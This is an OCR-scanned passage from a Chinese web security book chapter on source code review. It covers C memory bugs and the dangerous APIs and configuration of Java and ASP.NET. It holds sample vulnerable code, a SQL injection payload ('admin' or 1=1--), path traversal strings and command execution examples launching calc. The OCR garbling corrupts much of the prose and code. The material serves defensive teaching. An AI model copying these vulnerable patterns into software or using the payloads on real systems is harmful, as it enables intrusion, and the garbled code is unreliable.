BOOL CALLBACK CFiles: :EnumNameProc (LPTSTR pszName) 

{ 








char strFileName [MAX PATH]|: 
strncpy (strFileName, pszName, strlen (pszName) ) :; 


} 

因此 ， 要 在 代码 中 彻底 搜索 缓冲 区 溢出 漏洞 ， 必 须 对 整个 代码 进行 仔细 地 逐 行 审查 ,追踪 对 
用 户 可 控制 的 数据 执行 的 每 一 项 操作 。 

2. 整 效 漏洞 

这 些 漏洞 的 表现 形式 各 异 , 而 且 非 常 难以 检测 ; 但 有 时 通过 源 代 人 码 中 的 签名 却 可 立即 确定 这 
类 漏洞 。 

比较 有 符号 与 无 符号 的 整数 时 经 常会 出 现 问题 。 以 下 代码 中 ， 上 一 个 漏洞 的 “修复 代码 ”对 
有 符号 的 整数 (len ) 与 无 符号 的 整数 ( sizeof (strFileName) ) 进行 比较 。 如 果 用 户 能 够 使 
len 为 负 值 ， 这 个 比较 就 会 成 功 进行 ， 而 且 未 经 检查 的 strcpy 仍 会 运行 

BOOL CALLEACK CrFiles: :EnumNameProc (LPTSTR pszName, int len.' 

{ 

















char strFileName [MAX PATH] : 





if {len < sizeof (strFileName)) 


stropy (strFileName, pszName}.: 


) 

3. 格式 化 字符 串 漏洞 

通常 ， 通 过 检查 printf 与 FormatMessage 系 列 困 数 的 用 法 ， 如 果 发 现 格式 化 字符 串 人 参数 
并 未 硬 编 码 ， 而 是 由 用 户 控 制 ， 就 可 以 立即 确定 这 类 漏洞 。 以 下 面 这 段 调 用 fprintE 困 数 的 代 
码 为 例 : 
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void logAuthenticationAttempt (char* USername ) :; 
{ 
char tmpl64]1: 
snprintf (tmp, 64, "login attempt for: %s\n'", USername): 
tmP[63] = 0; 
fprintf(lg logFile, tmp); 
} 


19.2.8 源 代 码 注释 


许多 软件 漏洞 可 以 从 源 代 码 注释 中 发 现 。 如 宁 开 发 者 意识 到 有 菏 项 操作 存在 危险 , 并 在 代码 中 
标注 提示 ， 准 备 以 后 修复 这 个 问题 ,但 却 从 未 者 手 修复 ， 这 时 就 会 出 现 以 上 情况 。 另 外 ， 如 采 测 
试 时 确定 应 用 程序 存在 某 种 反 第 行为 , 并 将 其 记录 在 注释 中 , 但 同样 从 未 对 这 种 行为 进行 全 面 调 
查 ， 这 时 也 会 出 现 上 面 的 情况 。 例 如 ， 我 们 钾 在 一 个 应 用 程序 的 生产 代码 中 明 到 以 下 代码 : 


char buf [200]; // I hope this is big enough 




















ee userinput).; 

在 代码 中 搜索 说 明和 常见 问题 的 注释 , 往往 可 以 迅速 发 现 许 多 明显 的 漏洞 。 下 面 是 一 些 已 证 明 
有 用 的 搜索 项 : 

D bug 

D problem 

DQ bad 

DQ hope 

D todo 

口 fix 

DQ overflow 

D crash 

DQ Inject 








加 XSS 
JU trust 


19.3 ”Java 平台 


本 市 主要 介绍 在 Java 平 台 上 获取 用 户 提 交 的 输入 的 方法 、 与 用 户 会 话 交 互 的 方式 、 存 在 的 洪 
在 危险 的 API 以 及 与 安全 相关 的 配置 选项 。 


19.3.1 确定 用 户 提 交 的 数据 


Java 应 用 程序 通过 :j aax.SerVlLet .httnp . HttpServletRequest 接 口 获取 用 户 提交 的 输 
人 ， 该 接口 对 javax.servlet.ServletRequest 接 口 进行 了 7 扩展。 这 两 个 接口 中 包含 了 大量 
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Web 应 用 程序 用 于 访问 用 户 提 交 的 数据 的 API。 表 19-1 列 出 的 API 可 用 于 获取 用 户 请 求 中 的 数据 。 
表 19-1 Java 平 台中 用 于 获取 用 户 提 交 的 数据 的 API 


API 


getParameter 
getparameterNames 
getPparameterValues 


摘 述 
以 String 名 称 与 Stzring 值 之 间 映 射 的 形式 保存 URL 碍 询 字 符 串 与 
POST 请 求 主体 中 的 参数 ， 使 用 这 些 API 可 以 访问 该 映射 


getParameterMap 

yetOueryString 返回 请 求 中 的 整个 查询 字符 串 ， 可 以 它 代 蔡 getParameterAPI 
getHeader 以 Stzing 名 称 与 Stzing 值 之 间 上 映射 的 形式 保存 请 求 中 的 HTTP 消息 头 ， 
人 使 用 这 些 API 可 以 访问 该 映射 

getHeaderNames 

getRequestURI 这 些 API 返 回 请 求 中 的 UREL， 包 括 查 询 字 符 串 

getRequestURL 

getCookies 返回 Cookie 对 象 的 一 个 数组 ， 其 中 包含 请 求 所 收 到 的 cookie 人 信息， 包括 


getRequestedSessionId 


它们 的 名 称 与 值 
在 某 些 情况 下 用 来 奉 代 getCcookies， 返 回 在 请 求 中 提交 的 会 话 ID 值 











getInputStream 这 些 API 返 回 客户 端 送 出 的 原始 请 求 的 不 同 表示 形式 , 因此 可 用 于 访问 其 
getReader 他 所 有 API 获 得 的 任何 信息 

getMethod 返回 HTTP 请 求 所 使 用 的 方法 

getProtocol 返回 HTTP 请 求 所 使 用 的 协议 

getServerName 返回 HTTP Host 消 息 头 的 值 

getRemoteUser 如 果 当 前 用 户 通 过 验证 ， 这 些 API 返 回 用 户 的 信息 ,包括 登录 名 。 如 果 用 


getUserprincipal 








户 可 以 在 目 我 注册 过 程 中 选择 日 己 的 用 户 名 ， 这 种 做 法 可 能 会 在 应 用 程 
序 的 处 理 过 程 中 引入 恶意 输入 





19.3.2 ”会话 交互 


Java 半 台 应 用 程序 使 用 Javax.servlet.http. HttpSession 接 口 保存 和 检索 当前 会 话 中 
的 信息 。 每 会 话 存储 (per-session storage ) 是 字符 串 名 称 与 对 象 值 之 间 的 一 个 映射 。 表 19-2 列 出 
的 API 用 于 保存 和 检索 会 话 中 的 数据 。 
表 19-2 ” Java 平台 中 用 于 与 用 户 会 话 交 互 的 API 
AP| 描述 

















setAttribute 用 于 保存 当前 会 话 中 的 数据 
putValue 

getAttribute 用 于 查询 保存 在 当前 会 话 中 的 数据 
getValue 

getAttributeNames 


getValueNames 
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19.3.3 ”潜在 危险 的 API 


这 一 节 介 绍 一 些 负 见 的 JavaAPI。 以 危险 的 方式 使 用 这 些 API 可 能 会 造成 安全 漏洞 。 

1. 文件 访问 

在 Java 中 ， 用 于 访问 文件 与 目录 的 主要 的 类 为 java.io.File。 从 安全 的 角度 看 ， 这 个 类 的 
最 重要 的 用 法 是 调用 它 的 构造 图 数 , 该 构造 图 数 接受 一 个 父 目 录 和 文件 名 , 或 者 仅 为 一 个 路 径 名 。 

无 论 以 哪 种 方式 使 用 构造 哨 数 , 如 末 未 检查 其 中 是 否 包含 点 -点 - 斜 线 序 列 就 将 用 户 可 控制 的 
数据 作为 文件 名 参数 提交 , 那么 可 能 会 造成 路 径 遍 历 漏洞 。 例 如 , 下 面 的 代码 将 打开 Windows CA 
驱动 硕 根 目录 下 的 一 个 文件 : 


String USerinput = "..\\boot.1ini"; 




















File f = new Filel("C:\\temp", userinput): 

在 Java 中 ， 沼 用 于 谈 取 与 号 入 文件 内 容 的 类 包括 : 

UD java.io.FileInputStream 

UD java.io.FileOutputStream 

UD java.io.FileReader 

UD java.io.FileWriter 

这 些 类 从 它们 的 构造 函数 中 提取 File 对 象 ， 或 者 通过 文件 名 字符 串 打 开 文件 。 如 果 用 户 可 
控制 的 数据 作为 这 个 参数 提交 ， 同 样 可 能 会 引入 路 径 遍 历 漏洞 。 例 如 : 


String USerinput = "..\\boot.1ini"; 








FileInputStream fis = new FileInputStream("C:\\temp\\" + usSerinput): 
2. 数据 库 访问 
下 面 这 些 是 稍 用 于 以 SQL 查询 执行 任何 一 个 字符 串 的 API: 


UD java.sdl .Connection.createStatement 





UD java.sdl .Statement .execute 

Djava.sql.Statement .executeQuery 

如 采用 户 提 交 的 数据 属于 以 查询 执行 的 字符 串 的 一 部 分 ， 那 么 它 可 能 易于 受到 SQL 注入 攻 
i 例如 : 





String username = "admin’' or 1=1-—",， 
String password = "foo"; 
Statement ss = connection.createSstatement{(}: 
SsS.executeQuery ("SELECT * FROM users WHERE USername = "' + USername + 
"' AND password = "' + password + "'");: 
站 之 十 上 /一 、 
已 执行 不 良 查 询 : 
SELECT * FROM users WHERE username = 'admin' or 1=1--' AND password = 'foo! 





下 面 的 API 更 加 稳定 可 靠 , 能 够 替代 前 面 描述 的 API, 允许 应 用 程序 创建 一 个 预先 编 详 的 SQL 
语句， 并 以 可 靠 且 类 型 安全 的 方式 指定 它 的 参数 占 位 符 的 值 : 


UD java.sqgql.Connection.prepareStatement 





19.3 Java 平台 527 


UD java.sql.PreparedStatement.setString 
UD java.sqgql.PreparedStatement .setInt 
UD java.sql.PreparedStatement.setBoolean 
UD java.sqgql.PreparedStatement .setObject 
java.sqgql.PreparedStatement .execute 
UD java.sqgql.PreparedStatement .executeQuery 
当然 还 有 许多 ， 此 处 不 一 一 列 出 。 
如 果 按 正常 的 方式 使 用 ， 这 些 API 就 不 易 受 到 SQL 注入 攻击 。 例 如 : 





String username = "admin’' or 1=1--—":; 
String password = "foo":; 
Statement SS = connection.preparestatement! 


"SELECT * FROM users WHERE username = ? AND password = 2?");: 
Ss.Setstring{1, username}); 
s.sSetSstring{2, password): 


s.executeQuery (); 
它 生 成 的 查询 等 同 于 : 


SELECT * FROM users WHERE username = 'admin'' or 1=1-- ANLD 








password = foo， 

3. 动态 代码 执行 

Java 语 言 本 吴 并 不 包含 任何 动态 评 佑 Java 源 代码 的 机 制 ， 尽 管 一 些 应 用 (主要 在 数据 库 产品 
中 ) 提供 了 评估 方法 。 如 果 所 审查 的 应 用 程序 动态 构建 任何 Java 代 码 ， 就 应 该 了 解 应 用 程序 如 何 
构建 这 些 代码 ， 并 决定 用 户 可 控制 的 数据 是 否 以 危险 的 方式 使 用 。 

4. OS 命令 执行 

下 面 的 API 用 于 在 Java 应 用 程序 中 执行 外 部 操作 系统 命令 : 


UD java.lang.runtime.Runtime.getRuntime 

















Djava.lang.runtime.Runtime.exec 

如 有 果 提 交 给 exec 的 字符 串 参 数 完全 可 由 用 户 控 制 ， 那么 几乎 可 以 肯定 应 用 程序 易于 受到 任 
何 命 令 执 行 攻击 。 例 如 ， 下 面 的 代码 将 运行 Windows calc 程 序 : 

String userinput = "calc",; 

RUuntime.getRuntime.exec (userinput): 


然而 ， 如 果 用 户 仪 能够 控制 提交 给 exec 的 部 分 字符 串 ， 那么 应 用 程序 可 能 不 易于 受到 攻击 。 
在 下 面 的 示例 中 ， 用 户 可 控制 的 数据 以 命令 行 参数 的 形式 提交 给 记事 本 进程 ， 引 起 它 尝 试 加 载 
| calc 文 档 : 


String userinput = "| calc"; 








Runtime.getRuntime.exec ("notepad " + userinput): 

exec API 本 身 并 不 解释 & 与 | 等 shell 元 字符 ， 因 此 这 个 攻击 失败 。 

有 时 ， 仅 控制 部 分 字符 串 提 交 给 sxec 仍 然 足 以 执行 任意 命令 ; 例如 下 面 这 个 稍微 不 同 的 示 
例 注意 notepadq 后 面 缺少 一 个 空格 ): 
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String UsSerinput = NANASYSLenm32ANANACalLcn : 
RUuntime.getRuntime() .exec ("notepad" + usSerinput): 


通常 ， 在 这 种 情况 下 ， 应 用 程序 将 易于 受到 除 代 人 码 执 行 以 外 的 攻击 。 例 如 ， 如 果 应 用 程序 以 
用 户 可 控制 的 参数 作为 目标 URL 执 行 wget 程 序 , 那么 攻击 者 就 可 以 向 wget 进 程 传递 危险 的 命令 行 
参数 ， 例 如 ， 致 使 它 下 载 一 个 文档 ， 并 将 该 文档 保存 在 文件 系统 中 的 任何 位 置 。 

5. URL 重 定向 

下 面 的 API 用 于 在 Java 中 发 布 HTTP 重 定 问 : 


UD javax.servlet.http.HttpServletResponse.sendRedirect 








UD javax.servlet.http.HttpServletResponse.setStatus 

UD javax.servlet.http.HttpServletResponse.addHeader 

通常 , 使 用 sendRedirect 方 法 可 以 引起 一 个 重 定 问 啊 应 ,该 方法 接受 一 个 包含 相对 或 绝对 
URE 的 字符 串 。 如 末 这 个 字符 串 的 值 由 用 户 控制 ， 那 么 应 用 程序 可 能 易于 受到 钓鱼 攻击 。 

还 应 该 审查 setStatus 与 addHeader API 的 所 有 用 法 。 如 果 某 个 重 定 回 包含 一 个 含有 HTTP 
Location 消 息 头 的 3xx 啊 应 ， 应 用 程序 就 可 能 使 用 这 些 API 执 行 重 定 回 。 

6. 套 接 字 

java.net.Socket 类 从 它 的 构造 咀 数 中 提取 与 日 标 主 机 和 端口 有 关 的 各 种 信息 ， 如 有 果 用 户 
能 够 以 某 种 方式 控制 这 些 信息 , 攻击 者 就 可 以 利用 应 用 程序 与 任意 主机 建立 网 络 连接 , 无论 这 些 
主机 位 于 因特网 上 、 私 有 DMZ 中 还 是 在 应 用 程序 上 运行 的 内 部 网 络 内 。 





























19.3.4 配置 Java 环 境 


web.xml 文 件 包含 Java 平 台 环 境 的 配置 设置 ， 同 时 它 还 控制 着 应 用 程序 的 行为 。 如 果 应 用 程 
序 使 用 容器 安全 管理 , 那么 验证 与 授权 将 在 web.xml 文 件 中 , 根据 被 保护 的 每 一 个 资源 或 资源 集 ， 
于 应 用 程序 代码 以 外 声明 。 可 在 web.xml 文 件 中 设置 的 配置 选项 如 表 19-3 所 示 。 

表 19-3 Java 环境 中 与 安全 有 关 的 配置 设置 


设 置 描 




















[Ee 





loolin-oont le login-config 元 素 配 置 验证 细 方 
两 类 了 验证 分 别 为 forms-based ( 页面 由 form-login-page 元 素 指 定 ) 与 在 
auth-method 元 率 中 指定 的 Basic Auth 或 Client-Cert 
如 果 使 用 基于 表单 的 验证 ， 指 定 的 表单 必须 将 操作 定义 为 j]_security_check, 并 必 
须 提 交 j_username 与 j]_password 参 数 , Java 应 用 程序 将 把 它 当 做 一 个 登录 请 求 处 理 














Security- Constralnt 如 果 定 义 了 login-config 元 素 ， 就 可 以 使 用 security-constraint 元 素 限 定 资 
源 。 这 个 元 素 可 用 于 定义 受 保 护 的 资源 
在 security-constraint 元 素 中 ,可 以 使 用 url-pattern 元 素 定 义 资源 集 。 例 如 : 
<url-pattern>/admin/*</url-pattern> 
分 别 在 role-name 与 principal-name 元 系 中 定义 的 角色 与 主要 用 户 可 以 访问 这 些 
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( 续 ) 
设 和 置 描述 
session-config session-timeout 元 素 配置 会 话 超 时 (单位 : 分 钟 ) 
error-page error-page 元 素 定 义 应 用 程序 如 何 处 理 错 误 。 通 过 error-code 与 exception- 
type 元 素 可 单独 处 理 HTTP 错 误 代 人 码 与 Java 异 常 
Lni tb aram init-param 元 素 配 置 各 种 初始 化 参数 。 其 中 包括 与 安全 有 关 的 设置 : 


口 1istings 应 设置 为 false 
口 debug 应 设置 为 0 


Servlet 可 以 使 用 HttpSservletRedquest .isUserInRole 访 问 Servlet 代 人 码 中 的 相同 角色 售 
县 , 实施 编程 检查 。 上 映射 项 security-role-zef 将 内 置 的 角色 检查 与 对 应 的 容 硕 角色 连接 起 来 。 

除 web.xml 文 件 外 ,不同 应 用 程序 服务 需 还 可 能 使 用 包含 其 他 安全 相关 设置 的 次 要 部 署 文件 
( 如 weblogic.xml 文 件 )， 当 分 析 环 境 配 置 时 ， 应 检查 这 些 设置 。 

















19.4 ASPNET 


本 节 主 要 介绍 在 ASPNET 平 台 上 获取 用 户 提 交 的 输入 的 方法 、 与 用 户 会 话 交 互 的 方式 、 其 中 
存在 的 潜在 危险 的 API 以 及 与 平 台 安全 相关 的 配置 选项 。 


19.4.1 确定 用 户 提 交 的 数据 


ASPNET 应 用 程序 通过 System.Web.HttpRequest 类 获取 用 户 提 交 的 输入 。 这 个 类 中 包含 
大 量 Web 应 用 程序 用 于 访问 用 户 提 交 的 数据 的 属性 和 方法 。 表 19-4 列 出 的 API 可 用 于 获取 用 户 请 
求 中 的 数据 。 























表 19-4 ASP.NET 平 台中 用 于 获取 用 户 提 交 的 数据 的 API 




















API 摘 述 

Params 以 String 名 称 与 String 值 的 形式 保存 URL 查 询 字 符 串 、 0 HTTP 
cookie 以 及 其 他 服务 如 变 量 中 的 参数 。 这 个 属性 返回 这 些 参数 类 型 的 集 

Item 返回 Param 和 集合 中 的 命名 项 

Form 返回 用 户 提交 的 表单 变量 名 称 与 变量 值 集合 

QueryString 返回 请 求 查询 字符 串 中 变量 名 称 与 变量 值 的 集合 

ServerVariables 返回 大 量 ASP 服 务 器 变量 (类 似 于 CGI 变量 ) 名 称 与 变量 值 的 集合 ， 包 括 请 求 原始 
数据 、 查 询 字符 串 、 请 求 方法 、 HTTP Host 消 息 头 等 

Headers 以 String 名 称 与 String 值 之 间 的 映射 的 形式 保存 请 求 中 的 HTTP 消 息 尖 ,使 用 这 
个 属性 可 以 访问 该 映射 

UE 这 些 属性 返回 请 求 中 的 URL 人 信息， 包括 查询 字符 串 


RawUrl 
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( 续 ) 
API 描 述 
UrlReferer 返回 与 在 请 求 的 HTTP Referer 消 息 头 中 指定 的 URL 有 关 的 信息 
Cookies 返回 cookie 对 象 的 集合 ， 其 中 包含 请 求 所 收 到 的 cookie 的 信息 ， 包 括 它 们 的 名 称 
与 值 
Files 返回 用 户 上 传 的 文件 集合 
Tyt etreanm 这 些 API 返 回 客户 端 送出 的 原始 请 求 的 不 同 表 示 形 式 , 因此 可 用 于 访问 其 他 所 有 API 
BinaryRead 获得 的 任何 信息 
HttpMethod 返回 HTTP 请 求 所 使 用 的 方法 
Browser 返回 用 户 浏 览 器 的 信息 ， 与 在 HTTP User-Agent 消 息 头 中 提交 的 信息 类 似 
UserAgent 
AcceptTypes 返回 客户 端 支持 的 MIME 类 型 的 字符 串 数 组 ， 与 在 HTTP Accept 消 息 头 中 提交 的 信 
县 类 似 
UserLanguages 返回 包含 客户 端 所 接受 的 语言 的 字符 串 数 组 ， 与 在 HTTP Accept-Language 消 息 


头 中 提交 的 信息 类 似 


19.4.2 ”会考 交互 


ASP.NET 应 用 程序 以 各 种 方式 与 用 户 会 话 进 行 交 互 ， 以 保存 和 检索 计 息 8 
使 用 session 属 性 可 轻松 保存 和 检索 当前 会 话 中 的 信息 。 这 个 属性 的 访问 方式 与 任何 其 他 索 
引 集 合 类 似 : 


Session["MyName"] = txtMyName .Text: // 保 存 用 户 名 
Jblwelcome.Text = "Welcome "+Session["MyName"]; // 检 索 用 户 名 


ASP.NET 个 性 化 配置 di 2 不 同 之 处 在 于 ,前 者 相对 于 一 
个 特定 的 用 户 ， 因 此 在 相同 用 户 的 不 同 会 话 中 持续 你 存 不 变 。 在 不 同 的 会 话 中 ， 用 户 的 号 份 通过 
验证 机 制 或 一 个 特殊 的 持久 性 cookie 得 以 重新 确认 。 在 用 户 个 性 化 配置 中 ， 数据 以 下 列 方式 保存 





























和 检索 : 
Profile.MyName = txtMyName.Text:; / /保存 用 户 名 
jblWelcome.Text = "Welcome " + Profile.MyName; // 检 索 用 户 名 


男 外， System.Web.SessionState. HttpSessionState 类 也 可 用 于 保存 和 检索 会 话 中 的 
于 县 。 它 以 字符 驯 名 称 与 对 象 值 之 间 上 映射 的 方式 保存 信息 ， 使 用 表 19-5 中 列 出 的 API 可 以 访问 这 
个 映射 。 

表 19-5 ASP.NET 平 台中 用 于 与 用 户 会 话 交 互 的 AP 
API 描 述 
Adq 在 会 话 集合 中 增加 一 个 数据 项 
Item 获取 或 设 定 集合 中 命名 数据 项 的 值 
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( 续 ) 
API 描 述 
Keys 返回 集合 中 所 有 数据 项 的 名 称 
GetEnumerator 
CopyTo 将 值 组 成 的 集合 复制 到 数组 中 


19.4.3 潜在 危险 的 API 


这 一 节 介 绍 一 些 常见 的 ASPNETAPI。 以 危险 的 方式 使 用 这 些 API 可 能 会 造成 安全 漏洞 。 

1. 文件 访问 

System.IO.File 是 用 于 访问 ASPNET 文件 最 主要 的 类 。 它 的 所 有 方法 都 是 静态 的 , 并 且 没 
有 公共 构造 函数 。 

这 个 类 的 37 个 方法 全 都 接受 一 个 文件 名 作为 参数 。 如 果 未 检查 其 中 是 否 包含 点 -点 - 斜 线 序 
列 , 就 提交 用 户 可 控制 的 数据 , 就 会 造成 路 径 遍 历 漏洞 。 例如 ,下面 的 代码 将 打开 Windows Ci:\ 驱 
动 器 根 目录 下 的 一 个 文件 : 


String userinput = "..\\boot.1ini",; 
FileStream fs = File.Open("C:\\temp\\" + userinput, 
FileMode.OpenOrCreate); 


下 面 的 类 第 用 于 读 取 与 写 入 文件 内 容 : 


DD System.IO.FileStream 




















DD Svstem.IO.StreamReadeL 

DD System.IO0O.StreamWriter 

它们 的 各 种 构造 函数 接受 一 个 文件 路 径 作为 参数 。 如 采 提 交 用 户 可 控制 的 数据 ,这 些 构造 函 
数 可 能 引入 路 径 过 历 漏洞 。 例 如 : 


String userinput = " .ANNvfoo.tXt" 











FileStream fs = new FileStream("F:\\tmp\\" + usSerinput, 
FileMode.OpenOrCreate),; 


2. 数据 库 访问 
ASPNET 有 许多 用 于 访问 数据 库 的 API， 下 面 的 类 主要 用 于 建立 并 执行 SQL 语 人 句 : 


UD System.Data.SqlClient.SgqlCommand 








UD System.Data.SqlClient.SqlDataAdapter 

DD System.Data.Oledb.OleDbCommand 

DD System.Data.Odbc.OdbcCommand 

DD System.Data.SqlServerCe.SgqlCeCommand 

其 中 每 个 类 部 有 一 个 构造 函数 ， 它 接受 一 个 包含 SQL 语 名 的 字符 串 ; 而 且 每 个 类 都 有 一 个 
CommandText 属 性 ， 可 用 于 获取 并 设 定 SQL 语句 的 当 前 值 。 如 果 适 当 地 配置 一 个 命令 对 象 ， 通过 
调用 Execute 方 法 即 可 执行 SQL 语句 。 
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如 果 用 户 提交 的 数据 属于 以 查询 执行 的 字符 串 的 一 部 分 , 那么 应 用 程序 可 能 易于 受到 SQL 注 
人 攻击 。 例如 。 


string username = "admin’' or 1=1--—"; 

String Password = "foo"™; 

OdbcCommangd c = new OdbcCommangd ("SELECT * FROM users WHERE usSername = 工 ? 
+ uSername + "' AND password = "' + Password + "'", Connection); 


C.FExecuteNonOQuery!().; 


> 人 人 一 、 
已 会 执行 不 良 查 询 : 
SELECT * FROM users WHERE username = 'admin’' or 1=1--—! 
AND password = 'foo': 





上 上 面 列 出 的 每 一 个 类 通过 它们 的 Parameters 属 性 文 持 预 处 理 语 句 ， 人 允许 应 用 程序 创建 一 个 
包含 参数 占 位 符 的 SQL 语 名 ,并 以 可 菲 且 类 型 安全 的 方式 设 定 这 些 占 位 符 的 伸 。 如 末 按 正常 的 方 
式 使 用 ， 这 种 机 制 就 不 易 受 到 SQL 注 入 攻击 。 例 如 : 





String username = "admin’' or 1=1-——"; 

String password = "foo".; 

OdbcCommand ¢ = new OdbcCommangd ("SELECT * FROM users WHERE username = 
Gusername AND password = @password", connection),; 

CcC.Parameters.Add lnew OdbcPparameter ("Qusername", OdbcType.Text) .Value = 

USername): 


cC.Parameters.Add (new OCdbcParameter ("@Qpassword", OdbcType.Text) .Value 
Dassword); 
c.ExecuteNonOQuery(}); 








它 生 成 的 查询 等 同 于 : 
SELECT * FROM users WHERE username = :adqman or 1=1--: 
AND password = :foaos: 


3. 动态 代码 执行 

VBScript 函 数 Eval 接 受 一 个 包含 VBScript 表 达 式 的 字符 串 自 变 量 。 该 函数 求 出 这 个 表达 式 的 
值 , 并 返回 结果 。 如 果 用 户 可 控制 的 数据 被 合并 到 要 计算 值 的 表达 式 中 , 那么 用 户 就 可 以 执行 任 
意 命令 或 修改 应 用 程序 的 逻辑 。 

国 数 Execute 和 ExecuteGlobal 接 受 一 个 包含 ASP 代 码 的 字符 串 , 这 个 ASP 代 码 与 直接 出 现 
在 脚本 中 的 代码 的 执行 方式 完全 相同 。 冒 号 分 隔 符 用 于 将 几 个 语句 连接 在 一 起 。 如 果 加 Execute 
国 数 提交 用 户 可 控制 的 数据 ， 那 么 攻击 者 就 可 以 在 应 用 程序 中 执行 任意 命令 。 

4. OS 命令 执行 

下 面 的 API 可 以 各 种 方式 在 ASPNET 应 用 程序 中 运行 外 部 进程 : 


System.Diagnostics.Start.Process 














D System.Diagnostics.Start.ProcessStartInfo 

在 对 对 象 调用 start 之 前 ， 可 以 回 静 态 Process start 方 法 提交 一 个 文件 名 字符 串 ) 或 者 
用 一 个 文件 名 配置 Process 对 象 的 StartInfo 属 性。 如 果 文 件 名 字符 串 可 完全 由 用 户 控 制 ， 那么 
应 用 程序 几乎 可 以 肯定 易于 受到 任意 命令 执行 攻击 。 例 如 , 下 面 的 代码 将 运行 Windows calc 程 序 : 
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string userinput = "Calcr 


Process.Start (userinput):; 
然而 ， 如 采用 户 仪 能 够 控制 提交 给 start 的 部 分 字符 串 ， 那么 应 用 程序 仍然 可 能 易于 受到 攻 
让 例如 : 


string userinput = "mT..M\M\..\\..\\Windows\\System32\\calc"; 
Process.Start("C:\\Program Files\\MyAPP\\bIin\\" + Userinput).; 


API 并 不 解释 & 与 | 等 shell 元 字符 ， 也 不 接受 文件 名 参数 中 的 命令 行 参 数 ， 因 此 ， 如 果 用 户 
仅 控制 文件 名 参数 的 一 部 分 ， 这 种 攻击 是 唯一 能 够 成 功 的 攻击 。 

已 被 启动 的 进程 的 命令 行 参数 可 以 使 用 ProcessSstartIinfo 类 的 Arguments 属 性 设 定 。 如 
果 只 有 Arguments 参 数 可 由 用 户 控 制 ， 应 用 程序 仍然 易于 受到 除 代码 执行 以 外 的 其 他 攻击 。 例 
如 ， 如 采 应 用 程序 以 用 户 可 控制 的 参数 作为 目标 URL 执 行 wget 程 序 ， 那 么 攻击 者 就 可 以 癌 wget 
进程 提交 危险 的 命令 行 参数 , 例如 ,致使 它 下 载 一 个 文档 ,并 将 该 文档 保存 在 文件 系统 中 的 任何 
位 置 。 

5. URL 重 定向 

下 面 的 API 用 于 在 ASPNET 中 发 布 一 个 HTTP 重 定 问 : 


DD System.Web.HttpResponse.Redirect 














UD System.Web.HttpResponse.Status 

System.Web.HttpResponse.StatusCode 

DD System.Web.HttpResponse.AddHeader 

System.Web.HttpResponse.AppendHeader 

UD Server.Transfer 

通常 ， 使 用 HttpResponse.Redirect 方 法 可 以 引起 一 个 重 定 问 啊 应 ， 该 方法 接受 一 个 包 
含 相对 或 绝对 URL 的 字符 串 。 如 果 这 个 字符 串 的 值 由 用 户 控 制 ， 那么 应 用 程序 可 能 易于 受到 钓 
鱼 攻 击 。 

还 炎 ` 须 确保 今 查 Status/Statuscode 属 性 与 AdqdqHeaqer /AppendHeader 方 法 的 用 法 。 如 果 某 
个 重 定向 包含 一 个 含有 HTTP Location 消 息 头 的 3xx 响 应 , 应 用 程序 就 可 能 使 用 这 些 API 执 行 重 定向 。 

Server .Transfer 方 法 有 时 也 可 用 于 实现 重 定 癌 。 实际 上 , 这 个 方法 并 不 能 实现 HTTP 重 定 
问 ， 而 是 应 根据 当前 请 求 修 改 被 服务 硕 处 理 的 页 面 。 因 此 ， 不 能 通过 破坏 它 重 定 回 到 一 个 站 外 
URL; 这 个 方法 对 攻击 者 而 言 并 没有 多 大 用 处 。 

6. 套 接 字 

System.Net.Sockets. Socket 类 用 于 创建 网 络 套 接 字 。 创建 一 个 Socket 对 象 后 用 通过 
调用 connect 方 法 连接 这 个 对 象 ; 该 方法 接受 目标 主机 的 IP 与 端口 信息 为 参数 。 如 果 用 户 能 够 以 
某 种 方式 控制 这 些 主机 信息 , 攻击 者 就 可 以 利用 应 用 程序 与 任意 主机 建立 网 络 连接 , 无 论 这些 主 
机 位 于 因特网 上 、 私 有 DMZ 中 还 是 在 应 用 程序 上 运行 的 内 部 网 络 内 。 












































19.4.4 配置 ASP.NET 环 境 
Web 根 目录 下 的 web.config XML 文件 包含 ASPNET 环 境 的 配置 设置 ， 它 还 控制 着 应 用 程序 的 
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行为 ， 如 表 19-6 所 示 。 


表 19-6 ASP.NET 环 境 中 与 安全 有 关 的 配置 设置 
设 置 描述 

httpCookies 这 个 元 素 决 定 与 cookie 有 关 的 安全 设置 。 如 果 httponlyCookies 属 性 为 真 ， 那么 cookie 将 被 
标记 为 Httponly， 因 而 不 能 被 客户 端 脚 本 直接 访问 。 如 果 requireSSL 属 性 为 真 ，cookie 
将 被 标记 为 secure， 因 此 只 能 由 浏览 需 通 过 HTTPS 请 求 传送 

sessionstate 这 个 元 素 决 定 会 话 的 行为 。timeout 属 性 的 值 决定 一 个 空闲 会 话 的 到 期 时 间 (单位 : 分 钟 ) 。 
如 果 zregenerateExpiredSsessionId 元 素 设 为 true (默认 情况 ) ， 那 么 在 收 到 一 个 到 期 
会 话 ID 后 ， 将 发 布 一 个 新 的 会 话 ID 

compilation 这 个 元 素 决 定 是 否 将 调试 符号 编译 到 页 面 中 ， 生 成 更 详细 的 调试 错误 信息 。 如 果 debug 属 性 
为 true， 调 试 符号 将 包含 在 页 面 中 

customErrors 这 个 元 素 决 定 ， 如 果 发 生 无 法 处 理 的 错误 ,应 用 程序 是 否 返 回 详细 的 错误 消息 。 如 果 mode 属 
性 为 0n 或 Remoteonly， 那 么 应 用 程序 用 户 将 收 到 被 属性 defaultRedirect 确 认 的 页 面 ， 
而 不 是 系统 生成 的 详细 消息 
ASP.NET 将 在 请 求 消息 头 中 检查 潜在 的 注入 攻击 ， 包 括 跨 站 点 脚本 。 如 果 enable- 
VersionHeader 属 性 为 true (默认 情况 ) ，ASP.NET 将 输出 一 个 详细 的 版 本 字符 串 ， 攻 击 
者 可 利用 它 在 特定 版 本 的 平台 中 搜索 漏洞 


如 采 数 据 库 连 接 字 符 串 之 类 的 敏感 数据 保存 在 配置 文件 中 ， 应 使 用 ASP.NET“ 受 保护 配置 ” 
特性 加 密 这 些 数据 。 


















































19.5 PHP 


本 节 主 要 介绍 在 PHP 平 台 上 获取 用 户 提 交 的 输入 的 方法 、 与 用 户 会 话 交 互 的 方式 、 其 中 存在 
洲 在 危险 的 API 以 及 与 平台 安全 相关 的 配置 选项 。 
19.5.1 ”确定 用 户 提 交 的 数据 
PHP 使 用 一 系列 数组 变量 保存 用 户 提交 的 数据 ， 如 表 19-7 所 示 。 
表 19-7 PHP 平台 中 用 于 获取 用 户 提 交 的 数据 的 变量 
描述 


